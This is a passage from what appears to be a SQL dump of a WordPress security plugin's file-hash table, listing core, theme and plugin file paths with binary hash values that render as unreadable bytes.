�P','��H�M�c�6�v�H�@�EmO2\'5�n�ҬX��','',0,'?'),('p{\r�� �%>/�Z��:','wp-content/plugins/wordfence/views/scanner/issue-base.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m|�&vfƲ~��','�i\"��m�$�PyM����d��	���S�','',0,'?'),('p��)D�\"Ҫ�?�','wp-content/themes/wp-simple/inc/kirki/kirki/assets/css/customizer-dynamic-css-colors.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!>�!V�)ܼXN��K�','�ڲ�����}ekA�����9_tu0{_.��','',0,'?'),('p-r4�QC�S�H�y','wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-slider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� -���%	dmo�´T','�*��ܖ���,m%����i�[�\"��Ý�C�!','',0,'?'),('p:�,�`OlL�(�A','wp-content/plugins/wordfence/views/waf/waf-uninstall-success.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k�~�H���7�<�B��','\0!�F�E���KP��7߻�0��\n;6�}��$','',0,'?'),('pB���e�Gߴ^���R�','wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.structure.min.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)/4;�$۔�ެvi\\','�n���i��뗅�N�vX�7�Y]�����D','',0,'?'),('pM�j�۰��sԐ?�','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-dimension-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_�q�����4u��yd','^\'��\'D����I�8l.�F�~�����Jkȃ�Oe','',0,'?'),('pS>�w������1����','wp-content/themes/event/inc/front-page/program-schedule.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�˲?�x%�	c$�	��y','�ڌ���q�&J���y�lr���!�B','',0,'?'),('pUy�a	�b��va�;�8','wp-includes/js/comment-reply.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F���D6����x�','!�x��G�����Go�Df�B8xXC�','',0,'?'),('pX!\"T(��ߵ��v?�','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/controls/slider.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m^\\I�]�)�#���','�]�G�_3c����[���=�\Z�/�%1&','',0,'?'),('pz~q��_�������','wp-content/themes/Yegor/FT/options/options.php',0,'��WI�[��j(�]�9�7','��WI�[��j(�]�9�7','��Y���ۋ��������@`^;&X','',0,'?'),('p�C\"M��w��73Y��','wp-content/themes/metro-magazine/inc/customizer/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5U�O��Y�{,���?�^','�?¤�-M�a�!r-Ʌl�& �ʖ/T4ɤ1���','',0,'?'),('p��P���8�x���j','wp-content/themes/chronus/assets/css/themezee-related-posts.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#�B�^�]t������','\0�ޗ%{��^ǜ�M�s]��?���Zj�','',0,'?'),('p��!�հ�?��ij��m','wp-content/themes/newsmag/assets/vendors/machothemes/machothemes.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\n�gK�_��Ḻ��','��+T�?M��!��n�R@��Vqd>S@CQ�2�','',0,'?'),('p�ޜ��=����I ','wp-content/themes/education-hub/inc/custom-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'��+�.t9<�s��','��HQ��gǏ!�\Z���$����wN��Zr','',0,'?'),('p��.а��[ÍD�','wp-includes/deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���X�;|N.��S_d�?','S5�g���*����r����x�{��&','',0,'?'),('p��6\0��wjkA<�','wp-content/themes/wp-simple/inc/kirki/assets/js/controls/multicheck.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\��Q�bP1�U�IS�','EDF/8��(��5`1AĶ�&�����P0@N','',0,'?'),('p����x^Ӥ-��[��','wp-content/themes/newsmag/assets/sass/variables-site/_structure.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r`$��VBM�Uz�','}y:Q�q����[���fк}Zc�*��B;�','',0,'?'),('p��>�n�.9f�f�','wp-content/themes/hitmag/inc/customizer/styles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#�\n�m�\0t�Y�b','4��x�g�#�\'�W��6��\'\"2�(7��!','',0,'?'),('p��2z?�v�\'ǫB&�','wp-content/themes/simpleshift/inc/tgm/tgm-init.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B�7�q1Y�K��','�\"xXv]� ��y^����Q�!9R�j��<��>�j','',0,'?'),('p��\\*e�\n\rψ��','wp-content/plugins/wordfence/modules/login-security/classes/controller/notices.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z�83�?w�����W','\r.l]\\)	Z�q���p�]_^�u����J\n�%�','',0,'?'),('p̓0�2@��PF�tk','wp-content/plugins/wordfence/views/common/unsubscribe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y:h3�>��a ݑ�4~','E�q����Tg��O>F-��O�(�IƚZ��z','',0,'?'),('pϧZq���tP_�HR�','wp-content/themes/advance/inc/kirki/includes/scripts/class-kirki-scripts-tooltips.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':ۨ�+ӧ+��L�','ǕI{�+$�`o�	�>�C�M�[\0B�\Z8y�','',0,'?'),('p�u8�?����\r��9�r','wp-content/themes/simpleshift/assets/js/nicescroll.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�Q!�����q�`�t','�\rloPp%�䙝�ſ�.�\Z��tr���ێ\"~','',0,'?'),('p�}G��J��$��x','wp-includes/block-supports/align.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v(\0����1�i�`','��=o�.�k�4�Ŋ*�P\\������[�','',0,'?'),('p����b�~�oBk�Z','wp-content/plugins/akismet/class.akismet.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��~—<��p���k�','	�;\0[���FsY\ZΧ��`�Qx����\"�m','',0,'?'),('p��u�w��S�ɴ0�','wp-content/plugins/hello.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E��t�5\0���P��w','f��s��	u�c����~���0b����I�&5)','',0,'?'),('qqC��$�����@','wp-content/plugins/wordfence/views/common/page-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u3�^1!��Gѩ}:�L','8^!c�$u��w�y��)�+	&�&���<�','',0,'?'),('qs��A�t���d�\\','wp-includes/js/dist/warning.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@AUV����x��\0�','%|�l��U}}�@~�\\<��#��x�9�a\n��','',0,'?'),('q�Q������4��','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/scroll/annotatescrollbar.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v����ً�#H���','���;������%UM�Ǡ�\r��*rеa:0','',0,'?'),('q�3�D�J��1͸�0','wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-generic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Sno��P��/���',',®�%�4&ʐw�l�1(9g�c�����s','',0,'?'),('qe�\n�E��	>L噞','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/addon/fold/foldgutter.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�1��4�-��\0{�','Zz+�OH�	����=����2����6�','',0,'?'),('q\"�co���>�2Rh�]','wp-admin/includes/plugin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c��)��yf��t���','���!��������g|:ڧq�*օxɚI�t� ','',0,'?'),('q\"�w���6,K�o�i','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/controls/color.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����.d>G�\0�kN/G','��-gZ��y�OeO�\0�髚aj�v�\Z��k','',0,'?'),('q<X��4���w�С�','wp-content/themes/catch-flames/editor-style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��j~�;��@��','���iC�$�l9�B�_��Q��w�H#x��','',0,'?'),('qL���I�Lc�','wp-includes/class-wp-recovery-mode-link-service.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����}f/c�nx5','�k�������ޙ(Z��t�M\0��;�t\r','',0,'?'),('qX	`��#�QȔ�P ','wp-content/themes/catch-flames/sidebar-third.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'\\�?�\0�؇���P�','ϱ�6���me���݁�X��šf�}�����','',0,'?'),('q\\\"��z��#N��!','wp-content/themes/skt-pathway/inc/custom-functions.php',0,'�8������S�$','�8������S�$','�C��{*y5���S��IG+���L�a��','',0,'?'),('q]�j���&�4x��','wp-content/themes/advance/inc/kirki/assets/scss/controls/date.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m���\'e�/�R[��q�+','�]�4��˩SB�4K������7�~�\\��j','',0,'?'),('qh�3ג��\\�S��/','wp-content/themes/newsmag/inc/components/lazyload/class-newsmag-lazyload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9����|��J\\��TK\"','i>��9w�B�%�J���a��S��bx@�_���','',0,'?'),('qh�665�y|�=�?S	','wp-includes/js/jquery/jquery.serialize-object.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�D�B\ru�6����!','��`�RԶ�2ɀ�`��Mx��i�G�fz�C2�','',0,'?'),('qt��^�9�0=t�z','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-radio-image-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�i=����V>���','\0Q�}����m�P��{���#�D�R���','',0,'?'),('q�!�S:�J\\�n�&C�x','wp-content/themes/event/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Y��>3a|���','X�W#K�Y�z+���C�8�~3���W��','',0,'?'),('q��L��x�`Ӧ�','wp-content/themes/quicksand/template-parts/content-video.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�\\���^�v�̽��','�5�A�h~5�0�kMҽ��e��H;��\Z','',0,'?'),('q��f���EH�7�d�','wp-includes/css/dist/editor/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z���Ey��,��~','��t>\'�\"A�†ˊ��	�QN��\Z�gH��','',0,'?'),('q�^�YD�t;ELN��\n','wp-content/plugins/all-in-one-wp-security-and-firewall/logs/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('q�s���ƞ�ù��','wp-includes/rest-api/endpoints/class-wp-rest-post-types-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����!�Й�~L�C��','֓�2ǟ��lq�~�<%Z����g����','',0,'?'),('q��8�����(�\'�ڦ�','wp-content/themes/hitmag/inc/kirki/assets/js/controls/date.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w��^e���)\n8Vx�','uఓ2*)��5���;8������[�·&�6�L','',0,'?'),('q�P�H��Bse��#\0','wp-content/themes/university-hub/inc/hook/slider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q).���1�ٕ�	o','4�ތx�	�W�:CE\Zܡi�V͝V�5m�Ql�^','',0,'?'),('q��F~IfD�ө� xZf','wp-content/plugins/wordfence/css/diff.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','܀g	��	�$���`r�Q','��$��hEJ^54<$�ӭYc���’�&','',0,'?'),('q��G�l~m��q5SmM','wp-content/themes/graphene/images/social/linkedin.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3H-�aUh����a\r','��e�a\0��$4���uUw�����7����z@','',0,'?'),('q����R+�q�\Z�2�','wp-includes/js/dist/edit-post.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�):����sL?&��','�I��R=E\Z��`֚m٪�p\Zt~�#�`I��','',0,'?'),('q��@dc�d�=��־','wp-content/themes/brickyard/docs/assets/blueprint-css/plugins/link-icons/icons/feed.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U�0�`X>*���','�6�ǠMmXql����W$����s�N!��>tG','',0,'?'),('q�0\\y*3�Q�>vJ�','wp-content/plugins/wp-cerber/assets/flags/tw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ښ��� .�;���X','U��Ӥ�SQ��׈�{�5�𐮆c-y��','',0,'?'),('q�0���������5','wp-includes/sodium_compat/src/Core32/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5O&?��E�	��%','^%%�hT��,�����k2�Ȯn=n%:��','',0,'?'),('q��5@�*=�&��\\X�','wp-content/plugins/wordfence/lib/wfHelperBin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';��!�ȍ��4Q��X#','��չ%-�^�q��U�q�M��eY���','',0,'?'),('q�$\'6�e��-W]','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/PHP52/SplFixedArray.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nb�x	��BC��?���\Z','��e��C8�&\r����h\r��2w�(^Й�V\0','',0,'?'),('q�}zpZ�{}���\rM��','wp-content/themes/auberge/assets/js/vendor/imagesloaded.pkgd.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Q�����,#','ˏ�y��Zt���:?<`����f��eS�8���','',0,'?'),('q���Mq\n�H�D2��','wp-content/themes/authorize/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+q�}D��\'��4�f','�;�W{g��1 Q�ڎ]y���o ��:6L�$','',0,'?'),('q�.�ײ��6W�x','wp-content/themes/Endolf/FT/plugin/options-framework/includes/class-options-framework.php',0,'n .��OTJ%~9M��O','n .��OTJ%~9M��O','�%挌C�[����;n~�/HǷ�p�!/�l�jo','',0,'?'),('q�,��d�����E�','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/tern/worker.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ֵ_>wj�Ʊ��[��','�x������eP�@��3<—���� *\n<','',0,'?'),('q�_\ni�q\\�|�!�','wp-content/themes/newsmag/changelog.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s�b8���x�����','j�Y��D����D� ċs����D�w� �L$c�','',0,'?'),('q�=B{�D�Z��q','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/blackboard.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!Q�z�g`Z�X�G��','�\'�DN�B��5�P����)*i�rY���','',0,'?'),('r[��s2<�����u','wp-content/themes/twentytwentyone/assets/sass/06-components/posts-and-pages.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g<Q�P�;�z��[Ѩɹ','����j�Qo���<>�\n��Y�����g1�b','',0,'?'),('r��h��v��Lk/��','wp-admin/network/upgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q#��ԑ��\Z;f��','��3PJݎ��Y��b�GqA��8œo:?��>�','',0,'?'),('r+zk;� 4��WI','wp-includes/js/tinymce/themes/modern/theme.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(3�o�U�2ŝU�2�','�2.�pt�\"r�`)��\r.C�l�\\\Z��BIX','',0,'?'),('rI\0yg�E!���2\0C','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503-lockout.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P����mx�f�4	\"','���H&�(hn�U�-z$���&��Egj[�M�','',0,'?'),('rI�����FON�!','wp-content/themes/graphene/editor-style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����O\r\n�P�m','�Ʉe�������=<�&��Euii��\'5�mH�r','',0,'?'),('rJ`0#���R��L>�','wp-content/themes/authorize/front-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Bmx�<w[�X�-���','���w�cZ[f?T���ZB�T����:4�飯','',0,'?'),('rX�H�O����3��]','wp-content/themes/quicksand/css/font-awesome.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ĕeHix[��`!f�J�','����}��˹t$��)�ʦ��P��1��~܀��','',0,'?'),('r_��YrL�8�;��8E','wp-content/plugins/wp-cerber/assets/flags/ua.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���V	i��#Ʉ\r','�۽����,jI�7=3I�\0������\"�M7H','',0,'?'),('re��\'۷�11d��8�','wp-content/themes/twentytwentyone/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b/��RפH�{V���','2@:Uo�+�UJ7���˄�&yS���c�j��','',0,'?'),('rfjmj����Њ��z5','wp-content/themes/catch-responsive/js/jquery.cycle/jquery.cycle2.js.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����:`{Y�S�C�','����q�g:�/�T�?7ҙ����q���','',0,'?'),('rg|t�\\_V�¶WZ��','wp-content/themes/chronus/assets/icons/genericons-neue.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�$2��y;�G�,,\'Z','l�����N�L�y��[���������ƛ�r','',0,'?'),('rs��d��9v΃>�_�','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/markdown/markdown.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Bi_��\"�`��Q{','v4FY��^z%���\r��*Q�=�_���V�o�','',0,'?'),('rt�IŒg[��;���?','wp-includes/sodium_compat/namespaced/Core/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rV�N�ck0�}/�Ճ�','n�K��kZ��	���� N$ � EК���e�$','',0,'?'),('rz���&�$�Q|`E!','wp-content/themes/catch-flames/js/jquery.cycle/jquery.cycle2.scrollVert.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʒ�=q�\'���-ؤ�','�3_���y(���j�HT�{OA�?�!d�Z�YP','',0,'?'),('r{�\Ze��C۳�M�!Z','wp-content/themes/exoplanet/front-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ٜ[u�J�]gh(_/.','��� �}M6,=Q]�̴(��Ʉ;�g]�Ҡ^','',0,'?'),('r���?���;�lB�\\��','wp-content/themes/graphene/images/headers/techno.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0�gXď�W�C\0=\n�',')���X�dƊx����,P)?U���W!','',0,'?'),('r��)����d��RD�2','wp-content/plugins/wordfence/js/wfdashboard.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Խ�P����`�{i�','=P�z�r���!�?w\Z�/d!��LӪ��1!�','',0,'?'),('r�Y��4�\n�Z���','wp-content/themes/graduate/inc/customizer/theme-options/layout.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����~�%������c�','~�^��t�	��[��d�\\XM��Z�%\'�e�[�','',0,'?'),('r�(n՞���j��b\"','wp-admin/js/media.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ҋ$����(����','���sݝ���&��գʆ#�_�`�X','',0,'?'),('r��WI�	\'�H�	f~X','wp-content/themes/weblog/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(���G�;��d��','�y��\'�(�;DZ���&Ȩ�.6a�w���JG3','',0,'?'),('r��O�r\0�C<o�b#�j','wp-content/plugins/all-in-one-wp-security-and-firewall/wp-security.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V�ҵ�F��K�K��$��','���w�U��*S�������0ϙ�P7z�','',0,'?'),('r�.?xL�(o�{��','wp-content/themes/advance/inc/kirki/assets/scss/controls/generic.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x<��+CǯU���m','5K�X���gٱ�#$W���p+D����','',0,'?'),('r��������|J','wp-content/themes/hitmag/inc/kirki/assets/js/controls/palette.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',v&ne��._C>�H','�6F�[�شU�l���D���\0�\r5nRaMH','',0,'?'),('r�g�7B%�\rtL','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/addon/fold/comment-fold.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A���������y�','�kl��XOQwºILE)�#b�M}3y��m�','',0,'?'),('r�ƈ�������G�','wp-content/themes/hitmag/inc/kirki/assets/scss/controls/generic.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':X@P�rK\Zh��3=e_','5K�X���gٱ�#$W���p+D����','',0,'?'),('rߏ�!��9�����','wp-content/themes/lovecraft/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"^]�k{�	���в���','\r��z�gǔn�OQ����\\_36����=�f','',0,'?'),('r�3�e\\��,S�q','wp-includes/class-wp-block-supports.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}��C��ie�4���','�8r�ƻ�Iz�R��1L��u?-����','',0,'?'),('r�_�/��HG=�%�<�','wp-includes/images/arrow-pointer-blue-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%m�rތ]4�9c�','��{&DO�z��A�f�/��gá������A]~�(�','',0,'?'),('r�r�(J�g�(�y�t','wp-includes/js/mce-view.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2s�H��ّ;[���	s','��8`9ڰn�-.�	H�Dp��k+�γ��bI','',0,'?'),('r�߶�=Sr=9%e�w','wp-content/themes/graphene/admin/uninstall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����o0t8z�O�',']l�����^p��E��2GL�a�A�/a�N��','',0,'?'),('r��`���&b�Gg�A$�','wp-content/themes/catch-flames/inc/panel/images/full-content.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���`�Ukn��n��','�E�O#�T��n�\\�O���;m�D�{��','',0,'?'),('r�)�����e�l�','wp-includes/css/dist/list-reusable-blocks/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b�j��u9)�\n6�5','gg(($C���(rw�H\n�O���D!\rl��a�','',0,'?'),('r��\n��b��#��','wp-admin/css/media-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a���f�}��E\\','E�:�#��P�c;�&��T�$G@�\Zrp�J�iR','',0,'?'),('r�7��/y*�aڛP] 0','wp-content/plugins/wordfence/views/blocking/blocking-create.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�٥r��zż��S�5�','D{%WQ����Ȱ2����-\\�����l','',0,'?'),('s\r�$a1�<Ǐ~�2/\"','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/css/test.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t��+�س����\r]%','8�b���?��S1�\Z-$�0�Dsh��8q1�gu','',0,'?'),('s&�繗�DCl�s�H','wp-content/themes/twentytwentyone/assets/sass/05-blocks/heading/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������!�<�9�Ӫ','��:̶&E �\0@ؼ�k�P�	�n2R�I�','',0,'?'),('s�As�Y����D]','wp-content/plugins/wordfence/views/scanner/options-group-advanced.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P����Co���>~�','#�~���6��˞45���LW���V��^�','',0,'?'),('s�OP5���Xua-(O�','wp-content/themes/newsmag/assets/sass/forms/_fields.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'ē�5p�ovԊ�m�\r�','�Qv�L{��m�������A�G��rI*�','',0,'?'),('s ��i\\@3�)@H�|','wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-link.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&;\\�y�قm��M�','���t�\"\Z\\!�4�qe-��zU�һ9.�8','',0,'?'),('s#�h�S(9	��^�u?�','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/twig/twig.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����d�\Z�hW\'(�B','g(MԲt��P�df�:=�k�{��⌻�{Dr��','',0,'?'),('s-\r\Z�.�=W��m','wp-content/themes/simpleshift/inc/kirki/assets/scss/controls/date.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*��������ܵ&�','�]�4��˩SB�4K������7�~�\\��j','',0,'?'),('sG�$a��\\Z�K�q���','wp-content/themes/brickyard/images/icon-rss.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u�\\��y�-|p ���','�2���Q��\'�GWH�s|�f�i�*�����b','',0,'?'),('sL�fQ\\F�\'$g����','wp-content/themes/newsmag/screenshot.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���{�bl��*���y','�T�D������e���o��|�4^&\"�d���t','',0,'?'),('sZN����$*\'�W=;�','wp-content/themes/university-hub/third-party/font-awesome/css/font-awesome.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K��rFR��	S&2�','����}��˹t$��)�ʦ��P��1��~܀��','',0,'?'),('sc\0[U0�u���NR�','wp-content/themes/wp-simple/parts/blog-pagination.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������2ɨ_~��','ӡ2Q\r\nS��ü��HE���b��x[���Ov\\p','',0,'?'),('si��u�ͣ�#��1�v','wp-content/themes/wp-simple/inc/kirki/kirki/includes/field/class-kirki-field-preset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r:�g�,�u9{��\r4s','�d��u�D�:}��LD�pX�Le¸|���\r�','',0,'?'),('s�S5x�{��/����0','wp-content/themes/newsmag/template-parts/banner/banner-adsense.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*8�\rC5�b+���Sd','b��*�7���)��͞W�x�ȼ-�\0y{A�R','',0,'?'),('s�!�v�/\"U��\Z-','wp-content/themes/graphene/js/jquery.tools.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�a\n�Ж%��p�','�S�(4e�5�jK��~��;5۠��Iԑ�','',0,'?'),('s��ӣJ���~��k','wp-content/plugins/akismet/views/stats.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s�JJuw��&�R{��','w�ü}\Z�O�g��� f#�E�1g=g�Rz��F','',0,'?'),('s��j%���,R&\r6�','wp-content/themes/saybusiness/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ߗM�����x\Za�#','�\rN�U�qI�V^�#`:��lN\n&�ă��}','',0,'?'),('s�=X�+�e\n�*�q','wp-content/themes/university-hub/css/widgets.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?Uo\r�/B��qw@','Afݮ7Oxa<�}�NE�ߜS�*���\Z�Br','',0,'?'),('s�E�Ξq�p�B���','wp-admin/css/widgets-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x[ʦ�]��M	��','Y�g_��~��\"��%��ٍ���[#u�دv�','',0,'?'),('s����&�G���c��','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/lint/javascript-lint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Uv�	*��Ny����-%','�$���7\"6�䨞}�{?�ؽ2��]E�5','',0,'?'),('s�p��r�䶩IVL��','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/README.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K.���\0KL�5�=','�h\Z_���Х_<��r�+j\\���; ��','',0,'?'),('s��(:ӣ$������\r','wp-content/themes/twentynineteen/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�x̣���ۍJ��','�����X�e�����M�<!K��\0��ᆧ','',0,'?'),('s��pF��U�] 